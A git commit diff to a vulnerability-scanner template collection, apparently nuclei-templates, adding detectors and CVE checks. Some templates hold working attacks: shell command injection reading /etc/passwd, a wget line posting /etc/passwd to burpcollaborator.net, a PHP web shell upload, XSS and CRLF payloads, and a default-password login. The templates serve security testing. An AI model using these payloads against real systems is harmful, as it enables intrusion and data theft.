commit
b349e4aa0c
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 |
|
||||
| exposures | 55 | technologies | 47 | misconfiguration | 49 |
|
||||
| workflows | 23 | miscellaneous | 16 | default-logins | 16 |
|
||||
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
|
||||
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
|
||||
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**68 directories, 653 files**.
|
||||
**69 directories, 672 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -27,3 +27,4 @@ requests:
|
|||
- "</password>"
|
||||
- "DEVICE.ACCOUNT"
|
||||
part: body
|
||||
condition: and
|
|
@ -23,12 +23,19 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid(.*)"
|
||||
- "gid(.*)"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- text/plain
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -9,14 +9,14 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
|
||||
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\"><script>alert(1)</script>"
|
||||
- "<svg/onload=alert(xss)>"
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
|
|
|
@ -11,7 +11,7 @@ info:
|
|||
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
|
||||
Kylin's configuration information without any authentication,
|
||||
so it is dangerous because some confidential information entries will be disclosed to everyone.
|
||||
reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
|
||||
tags: cve,cve2020,apache
|
||||
|
||||
# References:
|
||||
|
@ -29,13 +29,15 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
condition: and
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config"
|
||||
- config
|
||||
- kylin.metadata.url
|
||||
condition: and
|
||||
part: body
|
||||
|
|
|
@ -9,13 +9,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
|
||||
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1)>"
|
||||
- "<svg/onload=alert(xss)>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2020-21224
|
||||
|
||||
info:
|
||||
name: Inspur ClusterEngine V4.0 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
|
||||
tags: cve,cve2020,clusterengine,rce
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/login.php'
|
||||
body: "op=login&username=;`cat /etc/passwd`&password="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-21315
|
||||
|
||||
info:
|
||||
name: Node.js Systeminformation Command Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
|
||||
tags: nodejs,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "wget --post-file /etc/passwd burpcollaborator.net"
|
||||
- name
|
||||
- running
|
||||
- pids
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2021-27132
|
||||
|
||||
info:
|
||||
name: CRLF Injection - Sercomm VD625
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
|
||||
tags: cve,cve2021,crlf
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Disposition: attachment;filename=test.txt"
|
||||
- "Set-Cookie:CRLFInjection=Test"
|
||||
- "Location: example.com"
|
||||
- "X-XSS-Protection:0"
|
||||
part: header
|
||||
condition: and
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2021-3129
|
||||
|
||||
info:
|
||||
name: Ignition Laravel RCE
|
||||
name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
|
||||
author: z3bd
|
||||
severity: critical
|
||||
description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE.
|
||||
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
|
||||
reference: https://www.ambionics.io/blog/laravel-debug-rce
|
||||
tags: cve,cve2021,laravel,rce
|
||||
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: alibaba-canal-default-password
|
||||
|
||||
info:
|
||||
name: Alibaba Canal Default Password
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: alibaba,dlogin
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/user/login"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
{"username":"admin","password":"123456"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'data":{"token"'
|
||||
- '"code":20000'
|
||||
condition: and
|
|
@ -44,7 +44,7 @@ requests:
|
|||
- j5Brn9
|
||||
- tomcat
|
||||
|
||||
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
|
||||
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
||||
|
||||
raw:
|
||||
# Request with simple param and header manipulation with DSL functions
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: acunetix-panel-detect
|
||||
|
||||
info:
|
||||
name: Acunetix Panel detector
|
||||
author: joanbono
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/#/login"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Acunetix</title>'
|
||||
- '<acx-root></acx-root>'
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,18 @@
|
|||
id: checkmarx-panel-detect
|
||||
|
||||
info:
|
||||
name: Checkmarx WebClient detector
|
||||
author: joanbono
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cxwebclient/Login.aspx"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
|
||||
part: body
|
|
@ -0,0 +1,18 @@
|
|||
id: hmc-hybris-panel
|
||||
|
||||
info:
|
||||
name: SAP Hybris Management Console
|
||||
author: dogasantos
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hmc/hybris"
|
||||
- "{{BaseURL}}/hybris/hmc/hybris"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "hybris Management Console"
|
||||
part: body
|
|
@ -0,0 +1,26 @@
|
|||
id: nessus-panel-detect
|
||||
|
||||
info:
|
||||
name: Nessus Panel detector
|
||||
author: joanbono
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/server/status"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{"code":200,"progress":null,"status":"ready"}'
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- 'NessusWWW'
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: exposed-bitkeeper
|
||||
|
||||
info:
|
||||
name: Exposed BitKeeper Directory
|
||||
author: daffainfo
|
||||
severity: low
|
||||
reference: https://www.bitkeeper.org/man/config-etc.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/BitKeeper/etc/config"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "logging"
|
||||
- "email"
|
||||
- "description"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: exposed-bzr
|
||||
|
||||
info:
|
||||
name: Exposed BZR Directory
|
||||
author: daffainfo
|
||||
severity: low
|
||||
reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.bzr/branch/branch.conf"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "parent_location"
|
||||
- "push_location"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: exposed-darcs
|
||||
|
||||
info:
|
||||
name: Exposed Darcs Config
|
||||
author: daffainfo
|
||||
severity: low
|
||||
reference: http://darcs.net/Using/Configuration#sources
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_darcs/prefs/binaries"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Binary file regexps"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: exposed-hg
|
||||
|
||||
info:
|
||||
name: Exposed HG Directory
|
||||
author: daffainfo
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.hg/hgrc"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "[paths]"
|
||||
- "default"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: joomla-config-dist-file
|
||||
|
||||
info:
|
||||
name: Joomla Config Dist File
|
||||
author: oppsec
|
||||
severity: low
|
||||
description: configuration.php-dist is a file created by Joomla to save Joomla settings.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/configuration.php-dist"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Joomla"
|
||||
- "JConfig"
|
||||
- "@package"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/plain"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: phpinfo-files
|
|||
|
||||
info:
|
||||
name: phpinfo Disclosure
|
||||
author: pd-team
|
||||
author: pd-team & daffainfo
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
|
@ -21,8 +21,10 @@ requests:
|
|||
- "{{BaseURL}}/time.php"
|
||||
- "{{BaseURL}}/index.php"
|
||||
- "{{BaseURL}}/temp.php"
|
||||
- "{{BaseURL}}/PHPInfo.php"
|
||||
- "{{BaseURL}}/old_phpinfo.php"
|
||||
- "{{BaseURL}}/infos.php"
|
||||
- "{{BaseURL}}/linusadmin-phpinfo.php"
|
||||
- "{{BaseURL}}/php-info.php"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: burp-rest-api-detect
|
||||
|
||||
info:
|
||||
name: Burp Rest API Server Running
|
||||
author: joanbono
|
||||
severity: info
|
||||
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/v0.1/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Burp API</title>'
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- 'X-Burp-Version'
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: ilo-detect
|
||||
|
||||
info:
|
||||
name: HP iLO
|
||||
author: milo2012
|
||||
severity: info
|
||||
description: Version of HP iLO
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xmldata?item=all"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- text/xml
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- <RIMP>
|
||||
- <HSI>
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- "<FWRI>([0-9.]+)</FWRI>"
|
|
@ -0,0 +1,31 @@
|
|||
id: microsoft-echange-server-detect
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange Server Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
|
||||
description: |
|
||||
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/owa/auth/logon.aspx"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
|
||||
part: all
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- X-Owa-Version
|
|
@ -10,7 +10,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
|
||||
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -19,7 +19,7 @@ requests:
|
|||
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
- "<svg/onload=alert(xss)>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,53 @@
|
|||
id: simple-employee-rce
|
||||
|
||||
info:
|
||||
name: Simple Employee Records System 1.0 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://www.exploit-db.com/exploits/49596
|
||||
tags: rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /dashboard/uploadID.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
|
||||
Content-Length: 267
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
-----------------------------5825462663702204104870787337
|
||||
Content-Disposition: form-data; name="employee_ID"; filename="poc.php"
|
||||
Content-Type: image/png
|
||||
|
||||
<?php
|
||||
$cmd=$_GET['cmd'];
|
||||
system($cmd);
|
||||
?>
|
||||
-----------------------------5825462663702204104870787337--
|
||||
- |
|
||||
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Length: 2
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- '(?:[a-zA-Z0-9+\/])*_poc.php'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue